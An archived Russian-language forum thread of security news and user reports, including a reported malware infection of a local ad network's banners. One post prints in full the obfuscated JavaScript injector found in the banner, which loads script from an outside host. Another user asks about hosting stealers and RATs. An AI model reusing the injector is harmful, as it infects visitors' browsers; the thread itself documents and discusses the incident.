PDA

Просмотр полной версии : «БЕЗОПАСНЫЕ» НОВОСТИ


Страницы : 1 [2]

Armenco
30.04.2013, 21:39
опубликован "Таллинский учебник"
Все специалисты в мире, которые имеют отношение к информационной безопасности, получили в распоряжение первый в истории официальный международный справочник по методам ведения кибервойны. Работа над книгой заняла почти четыре года, редактор издания — Майкл Шмитт (Michael N. Schmitt), директор отдела международного законодательства из американского военного колледжа в Ньюпорте, редакционная коллегия состоит из 20-ти человек.
добро пожаловать в век кибервойн (http://dfiles.ru/files/d2zdpyqj7) :naughty:

Armenco
03.05.2013, 20:22
Департамент образования города Шверин (Германия) не придумал ничего лучшего, как отправить на свалку 170 компьютеров (http://www.heise.de/newsticker/meldung/Schwerin-Virus-verseuchter-Rechner-Ab-auf-den-Muell-damit-1851718.html), заражённых вирусом Conficker. Сейчас этот инцидент расследуют власти. По их мнению, инвестиции 187 300 евро в столь радикальную форму удаления вирусов неприемлемо высоки. Из этой суммы 152 300 евро составляют затраты на покупку новой техники, а ещё 35 000 — затраты на её установку.
Инцидент произошёл в сентябре 2010 года, на пике заражения червём Conficker, в нескольких отделениях Педагогического института повышения квалификации (Rechner des Lehrerfortbildungsinstituts).
Что удивительно, департамент образования города Шверин защищал сделанные «инвестиции». Они говорили, что закупка лицензионных антивирусных программ, найм специалистов и проведение работ по удалению вирусов с компьютеров обошлись бы в 130 000 евро. У них якобы нет таких денег. Они посчитали, что разница небольшая, и лучше сделать апгрейд под предлогом «неисправности оборудования», получив на это дополнительное финансирование из бюджета. В итоге, решили очистить от вирусов только сервер, а все персональные компьютеры выкинуть.вот, молодцы, ребята.. правильно.. не хочешь заразиться - выдерни патч-корд, отруби нет, а если заразился - выброси комп и иди дальше.. нет слов :naughty: как оказывается все просто ...

Armenco
07.05.2013, 21:29
нет предела совершенствованию. (http://www.xakep.ru/post/60569/default.asp).

Armenco
21.05.2013, 18:59
умно...
Один из последних проектов хакера Аарона Шварца перед самоубийством в январе 2013 года — криптографически защищенная система Strongbox («Сейф»), с помощью которой информаторы могут надежно гарантировать свою анонимность, отправляя материалы в СМИ.

(http://www.xakep.ru/post/60638/default.asp)

Armenco
05.06.2013, 17:47
Касперски как всегда богат на раскрытие всяких глобальных вселенских шпионских сетей.. можно просто каждые два месяца публиковать пресс-релизы про всякие сети, тем более, что все новые похожи от и до на Красный октябрь...
Шпион, выйдти вон: «Лаборатория Касперского» раскрыла новую сеть кибершпионажа NetTraveler

//04.06.2013 http://www.xakep.ru/i/print_icon.png (http://www.xakep.ru/post/60732/default.asp?print=true) http://www.xakep.ru/i/comm_icon.png (http://www.xakep.ru/post/60732/default.asp#comment)
«Лаборатория Касперского» объявила о раскрытии новой кибершпионской сети, получившей название NetTraveler и затронувшей более 350 компьютерных систем в 40 странах мира. Атаке подверглись государственные и частные структуры, в том числе правительственные учреждения, посольства, научно-исследовательские центры, военные организации, компании нефтегазового сектора, а также политические активисты. Россия оказалась в числе наиболее пострадавших стран, заняв вторую строчку в рейтинге государств, испытавших на себе наиболее заметные последствия операции NetTraveler.


все это было и раньше...
Названия вложений наглядно демонстрируют целевой характер операции: злоумышленники адаптировали имя документа каждый раз при отправлении его в другую организацию таким образом, чтобы побудить получателя открыть файл.

Armenco
10.06.2013, 07:35
Опубликован текст директивы Обамы по ведению операций в интернете (http://www.guardian.co.uk/world/interactive/2013/jun/07/obama-cyber-directive-full-text)
Очередное изобретение АНБ (http://www.xakep.ru/post/60758/default.asp)

Shitikov Roman
20.09.2013, 18:51
Угроза однако
https://img.uforum.uz/images/cvptvdh5696939.png

alisherk
23.10.2013, 07:57
онлайн карта ddos`a (http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&time=16000&view=map)

Dmitry Paleev
30.01.2014, 11:11
Согласно официальному пресс-релизу прокуратуры города Атланта, штат Джорджия, США, федеральный суд рассмотрел дело об обвинении россиянина Александра Панина, известного под ником Gribodemon, в создании вируса SpyEye.

24-летний программист из России признал себя виновным в преступном сговоре с целью организации махинаций с денежными средствами и мошенничества, а также в создании троянской программы SpyEye.

Напомним, что троян, созданный Паниным, при инфицировании компьютера предоставлял хакерам доступ к учетным данным, PIN-кодам и другой информации о банковских счетах и платежных картах жертв.

Находясь в свободном доступе в сети Интернет. вирус скомпрометировал 1,4 млн компьютеров по всему миру. Более того, создатель продал SpyEye 150 «клиентам», один из которых за 6 месяцев использования трояна похитил более $3,2 млн со счетов жертв.

В 2010 году при помощи SpyEye хакеры похитили почти $70 млн у различных компаний, муниципалитетов и церквей в США.

Преступная группировка была обнаружена в 2011 году, а в июле 2013 года Панин был арестован в Доминиканской Республике и экстрадирован в США.

Факт признания вины и сотрудничество с властями позволило жителю Твери рассчитывать на 30 лет тюрьмы.

По словам адвоката подсудимого Аркадия Бука, тюремное заключение является лучшим, на что мог рассчитывать его клиент. Учитывая, что ФБР и правоохранительные органы США назвали Панина «одним из самых видных киберпреступников, из тех, кого удалось задержать и предать суду», обвинение могло потребовать высшую меру наказания.
Как отмечается в сообщении прокуратуры, приговор Панину будет вынесен 29 апреля текущего года.

Иванов Михаил
30.01.2014, 22:58
Рекламная сеть adv.uzinfocom.uz инфицирована JS:Redirector-BJC [Trj]
Баннеры этой сети размещены на uforum.uz
Подробности тут (http://www.avast.ru/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_90_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_vir=JS:Redirector-BJC%20[Trj]&p_prc=C:\Users\mic\AppData\Local\Google\Chrome\App lication\chrome.exe&p_obj=http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE|{gzip}&p_var=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_elm=7&p_lex=350&p_lid=ru-ru&p_lng=ru&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_bld=empty&p_vep=9&p_ves=0&p_vbd=2011&p_hid=6ba2277c-16ff-4485-878f-00acd9417b3d&p_ram=1982&p_cpu=4%2C9)
Уже пару недель, обычно такие "дыры" быстро устраняют, но так долго не "лечить" это нормально? На сколько я знаю это сценарий языка Java Script,которые содержит ссылки на зараженные странницы с которых в итоге происходит загрузка прочего malware. Если не стоит антивирус на компе, на ваш комп загрузиться malware/
=======================
http://i.imgur.com/6oRYZPn.png
=======================

Eldar Ishimbaev
31.01.2014, 13:10
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Иванов Михаил
31.01.2014, 18:08
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?

<script>try{$_=~[];$_={___:++$_,$$$$:(![]+"")[$_],__$:++$_,$_$_:(![]+"")[$_],_$_:++$_,$_$$:({}+"")[$_],$$_$:($_[$_]+"")[$_],_$$:++$_,$$$_:(!""+"")[$_],$__:++$_,$_$:++$_,$$__:({}+"")[$_],$$_:++$_,$$$:++$_,$___:++$_,$__$:++$_};$_.$_=($_. $_=$_+"")[$_.$_$]+($_._$=$_.$_[$_.__$])+($_.$$=($_.$+"")[$_.__$])+((!$_)+"")[$_._$$]+($_.__=$_.$_[$_.$$_])+($_.$=(!""+"")[$_.__$])+($_._=(!""+"")[$_._$_])+$_.$_[$_.$_$]+$_.__+$_._$+$_.$;$_.$$=$_.$+(!""+"")[$_._$$]+$_.__+$_._+$_.$+$_.$$;$_.$=($_.___)[$_.$_][$_.$_];$_.$($_.$($_.$$+"\""+$_.$$_$+"="+$_.$$_$+$_._$+$_.$$__+$_._+"\\"+$_.__$+$_.$_$+$_.$_$+$_.$$$_+"\\"+$_.__$+$_.$_$+$_.$$_+$_.__+";"+$_._+$_.$_$_+"=\\"+$_.__$+$_.$_$+$_.$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_.$$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$__+$_.$$$+$_.$_$_+$_.__+$_._$+"\\"+$_.__$+$_.$$_+$_._$_+"."+$_._+"\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.___+$_.__$+"\\"+$_.__$+$_.$__+$_.$$$+$_.$$$_+"\\"+$_.__$+$_.$_$+$_.$$_+$_.__+";\\"+$_.__$+$_.$_$+$_.__$+$_.$$$$+"("+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"==="+$_._+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$_$+$_.$$$_+$_.$$$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$_+$_.$$_$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('_"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"=')==-"+$_.__$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_._$_+$_.$$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$_$+$_._$+"\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_.$$_+$_._$$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$_.$$_+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.$__+$_.___+"')>"+$_.___+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_.__$+$_.$_$+"\\"+$_.__$+$_._$_+$_._$$+"\\"+$_.__$+$_.__$+$_.__$+"\\"+$_.__$+$_.___+$_.$_$+"\\"+$_.$__+$_.___+"')>"+$_.___+")\\"+$_.$__+$_.___+"{"+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"="+$_.__$+";"+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_+"='__"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"="+$_.__$+";\\"+$_.$__+$_.___+$_.$$$_+"\\"+$_.__$+$_.$$$+$_.___+"\\"+$_.__$+$_.$$_+$_.___+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$$+"=\\"+$_.__$+$_._$_+$_.$$$+$_.$$$_+$_.$$_$+",\\"+$_.$__+$_.___+$_.___+$_.__$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$_._$_+$_.$_$_+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.$__+$_.___+$_._$_+$_.___+$_._$_+$_.___+"\\"+$_.$__+$_.___+$_.___+$_.___+":"+$_.___+$_.___+":"+$_.___+$_.___+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_._$_+$_.$_$+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.__$+$_.___+$_._$$+";\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_.___+$_.$_$_+$_.__+"\\"+$_.__$+$_.$_$+$_.___+"=/';"+$_.$$_$+".\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+$_.__+$_.$$$_+(![]+"")[$_._$_]+"\\"+$_.__$+$_.$_$+$_.$$_+"(\\\"<\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\\"+\\\"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_.___+$_.__+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_._$$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"='\\"+$_.__$+$_.$_$+$_.___+$_.__+$_.__+"\\"+$_.__$+$_.$$_+$_.___+"://"+$_.$_$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.__$+$_.$$_+$_._$$+"."+$_.$_$$+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$$+$_._$_+"/"+$_.$_$+$_.$_$$+$_.$_$$+$_.$_$$+$_.___+$_.$$$_+$_. _$_+$_.__$+".\\"+$_.__$+$_.$_$+$_._$_+"\\"+$_.__$+$_.$$_+$_._$$+"?"+$_.$$__+"\\"+$_.__$+$_.$$_+$_.___+"="+$_.$_$_+$_.$$_$+"\\"+$_.__$+$_.$$_+$_.$$_+"."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$$+$_._$+$_.$$__+$_._$+"\\"+$_.__$+$_.$_$+$_.$_$+"."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"'></\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\\"+\\\"\\"+$_.__$+$_.$$_+$_.___+$_.__+">\\\");}"+"\"")())();}catch(e){}</script>

http://uforum.uz/attachment.php?attachmentid=9398&stc=1&d=1391173179

Котофей
31.01.2014, 18:53
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/

Иванов Михаил
31.01.2014, 19:10
с регулярными выражениями
Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/
Я на столько не разбираюсь в js/ А как его декомпилировать или расшифровать? Возможно это и не "вирус", но часто именно к скрытию кода прибегают создатели вирусов.
UPD вот похожий код http://www.linux.org.ru/forum/web-development/5547798

Ramil Ziganshin
31.01.2014, 19:28
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?
Ведем анализ. По результатам отпишемся.

Иванов Михаил
31.01.2014, 19:50
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало (http://bezoom.uz/novosti/uzbekistan/1180-pochemu-google-zablokiroval-sajt-informagentstva-uzbekistana) заражение на своем сайте. А "заражение" присутствовало.

Ramil Ziganshin
31.01.2014, 20:22
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Ведем анализ. По результатам отпишемся.
Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало (http://bezoom.uz/novosti/uzbekistan/1180-pochemu-google-zablokiroval-sajt-informagentstva-uzbekistana) заражение на своем сайте. А "заражение" присутствовало.

Нашли вредоносный код. Удалили.

Ramil Ziganshin
31.01.2014, 20:26
Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.
Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером (http://adv.uzinfocom.uz/www/delivery/afr.php?n=afe7ed9e&zoneid=63&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE) ?

Спасибо за сообщение. Проведем ревизию, усилим защиту.

ratheon
31.01.2014, 21:29
Спасибо за сообщение. Проведем ревизию, усилим защиту.
о реакции антивирусов на ваши рекламные баннеры уже писали полтора месяц назад, видимо "доходит" не с первого раза

Anvar Atakhanov
31.01.2014, 21:37
Полцарства тому кто устранить эту проблему:

https://img.uforum.uz/images/murksms8701437.jpg
Задолбал уже:dash2:

ratheon
31.01.2014, 21:41
Полцарства тому кто устранить эту проблему:
сменить браузер на время

Anvar Atakhanov
31.01.2014, 21:45
сменить браузер на время
Не дам вам полцарства Как то привик к этому браузеру, удобный, главной - БЕЗОПАСНЫЙ

Азизбек Кадыров
31.01.2014, 23:31
Полцарства тому кто устранить эту проблему:
Установите себе любой блокировщик рекламы. Для Firefox подойдет AdBlock, для Opera 10-12 можно отключить загрузку флеш в настройках, перейдя по адресу opera:config.

Anvar Atakhanov
31.01.2014, 23:59
У меня хромоид в виде Яндекс браузер, но будем ковыряться...

Слон
01.02.2014, 00:28
Тот же браузер. Но сейчас уже молчит.

Слон
01.02.2014, 16:01
Сейчас на Яндексе опять эта хрень вылезает. Интересно почему так реакция? Антивирус Comodo.

ratheon
01.02.2014, 18:46
Полцарства тому кто устранить эту проблему:
Установите себе любой блокировщик рекламы. Для Firefox подойдет AdBlock, для Opera 10-12 можно отключить загрузку флеш в настройках, перейдя по адресу opera:config.
зря вы про флэш, на рекламе инфокома был небезопасный javascript код

mouse
01.02.2014, 20:12
Полцарства тому кто устранить эту проблему:

https://img.uforum.uz/images/murksms8701437.jpg
Задолбал уже:dash2:
Заходила на сайт с компа, где стоял аваст, у меня было тоже самое, сейчас сижу с компа, где стоит каспер, все нормально

Ramil Ziganshin
03.02.2014, 09:16
Полцарства тому кто устранить эту проблему:
Задолбал уже:dash2:
Заходила на сайт с компа, где стоял аваст, у меня было тоже самое, сейчас сижу с компа, где стоит каспер, все нормально

Уважаемые пользователи. Ресурс adv.uzinfocom.uz по ошибке попал в Blacklist системы Yandex Safebrowsin - вот ссылка (https://www.virustotal.com/ru/url/d36aee90fef99dcba42a4aecb599f22099ce0ed7e8cd25c4b5 230926cf6b018f/analysis/1390823809/).

ratheon
04.02.2014, 12:56
Уважаемые пользователи. Ресурс adv.uzinfocom.uz по ошибке попал в Blacklist системы Yandex Safebrowsin - вот ссылка (https://www.virustotal.com/ru/url/d36aee90fef99dcba42a4aecb599f22099ce0ed7e8cd25c4b5 230926cf6b018f/analysis/1390823809/).
не по ошибке, а заслуженно

ClockeeLoo
21.02.2014, 20:40
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.

Иванов Михаил
12.03.2014, 17:38
http://i.imgur.com/nlOkwpu.png
Рекламная баннерная сеть afishamedia.uz разносит js вредоносный код (http://www.avast.ru/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_90_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_vir=JS:Redirector-BJB%20[Trj]&p_prc=C:\Users\mic\AppData\Local\Google\Chrome\App lication\chrome.exe&p_obj=http://oa.afishamedia.uz/www/delivery/spc.php?zones=10%7C11%7C12%7C13%7C27%7C30&source=politics&r=27126290&charset=UTF-8&loc=http%3A//www.gazeta.uz/2014/03/12/law/&referer=https%3A//www.facebook.com/|{gzip}&p_var=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_elm=7&p_lex=309&p_lid=ru-ru&p_lng=ru&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_bld=empty&p_vep=9&p_ves=0&p_vbd=2013&p_hid=6ba2277c-16ff-4485-878f-00acd9417b3d&p_ram=1982&p_cpu=4%2C9)
oa.afishamedia.uz использует тот же openx (http://openx.com/) что был заражен ранее на uforum (http://uforum.uz/showthread.php?p=969685&postcount=261)

German Stimban
17.03.2014, 15:04
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.

Это будет копипаста с иностранных сайтов или авторские статьи?

ClockeeLoo
18.03.2014, 21:49
Разрешено ли создавать сайты о вирусах типа стилеры, раты, крипторы, логгеры и выкладывать их туда?
Вроде таких сайтов в узнете нет, поэтому хотел создать такой форум.

Это будет копипаста с иностранных сайтов или авторские статьи?

копипаста

Janbolat
31.03.2014, 09:33
«Лаборатория Касперского» запустила интерактивную карту для отслеживания киберугроз. (http://cyberwar.kaspersky.com/)

German Stimban
31.03.2014, 14:21
Это будет копипаста с иностранных сайтов или авторские статьи?
копипаста
Тогда зачем такое счастье нужно?

ClockeeLoo
03.04.2014, 22:21
https://img.uforum.uz/images/wdyyhvj778674.jpg

ratheon
08.04.2014, 21:30
Критическая уязвимость в OpenSSL 1.0.1 и 1.0.2-beta шагает по планете:

Несколько часов назад сотрудники The OpenSSL Project выпустили бюллетень безопасности (https://www.openssl.org/news/secadv_20140407.txt), в котором сообщается о критической уязвимости CVE-2014-0160 в популярной криптографической библиотеке OpenSSL.

Уязвимость связана с отсутствием необходимой проверки границ (https://github.com/openssl/openssl/commit/7e840163c06c7692b796a93e3fa85a93136adbb2) в одной из процедур расширения Heartbeat (RFC6520) для протокола TLS/DTLS. Из-за этой маленькой ошибки одного программиста кто угодно получает прямой доступ к оперативной памяти компьютеров, чьи коммуникации «защищены» уязвимой версией OpenSSL. В том числе, злоумышленник получает доступ к секретным ключам, именам и паролям пользователей и всему контенту, который должен передаваться в зашифрованном виде. При этом не остается никаких следов проникновения в систему.

Некто, знавший об уязвимости, мог прослушивать «зашифрованный» трафик почти во всем интернете с марта 2012 года, когда вышла версия OpenSSL 1.0.1. В то время была продемонстрирована успешная атака на TLS (BEAST), и многие перешли на защищенную версию TLS 1.2, появление которой совпало с выходом OpenSSL 1.0.1.

Уязвимая версия OpenSSL используется в популярных веб-серверах Nginx и Apache, на почтовых серверах, IM-серверах, VPN, а также во множестве других программ. Ущерб от этого бага исключительно велик.

Азизбек Кадыров
08.04.2014, 22:50
Несколько часов назад сотрудники The OpenSSL Project выпустили бюллетень безопасности, в котором сообщается о критической уязвимости CVE-2014-0160 в популярной криптографической библиотеке OpenSSL.

Уязвимость? Или же намеренно оставленная закладка?

Марат Фаттахов
09.04.2014, 23:24
Это не просто уязвимость, это полный epic fail!

Проблема в том, что фактически любой более менее грамотный чел, может отправить спец. запрос на уязвимый сервер и получить содержимое части памяти этого сервера. А в этом содержимом - логины/пароли/куки/транзакции и многое другое.

Прежде всего в полной Ж - банки (привет интернет-банкингу), платёжные системы (пайнет в том числе) и интернет-провайдеры, имеющие персональный кабинет по HTTPS с уязвимым SSL).

Рунет уже на ушах стоит: http://habrahabr.ru/post/218661/

ИМХО сейчас такой момент, что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты, так или иначе имеющие отношение к Узбекистану, выйти на их сисадминов с настойчивой просьбой проапгрейдить SSL!

ratheon
10.04.2014, 00:34
ИМХО сейчас такой момент, что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты, так или иначе имеющие отношение к Узбекистану, выйти на их сисадминов с настойчивой просьбой проапгрейдить SSL!
бредовая идея.
uz-cert ни за что не отвечает, так зачем впрягатся

Eldar Ishimbaev
10.04.2014, 09:22
что сотрудникам UZ-CERT надо собраться с духом и обойти всевозможные HTTPS сайты
UZ-CERT прекратил свое существование с ноября месяца 2013 года. Все функции и задачи переданы в ГУ Центр обеспечения информационной безопасности.

saidabek1
17.02.2016, 22:17
Прощай, Opera mini! Спасибо те за все! Разблокировка браузера и продажа Opera Software китайской компании хорошо совпадают по времени. Есть ли у тех, кто разблокировал Opera Software в Узбекистане, доступ к Золотому Щиту, или нет - сие не важно. Разблокированное - что жало, положи, где лежало...

Andrews
18.02.2016, 00:29
Прощай, Opera mini! Спасибо те за все! Разблокировка браузера и продажа Opera Software китайской компании хорошо совпадают по времени. Есть ли у тех, кто разблокировал Opera Software в Узбекистане, доступ к Золотому Щиту, или нет - сие не важно. Разблокированное - что жало, положи, где лежало... Вообще ничего не понял....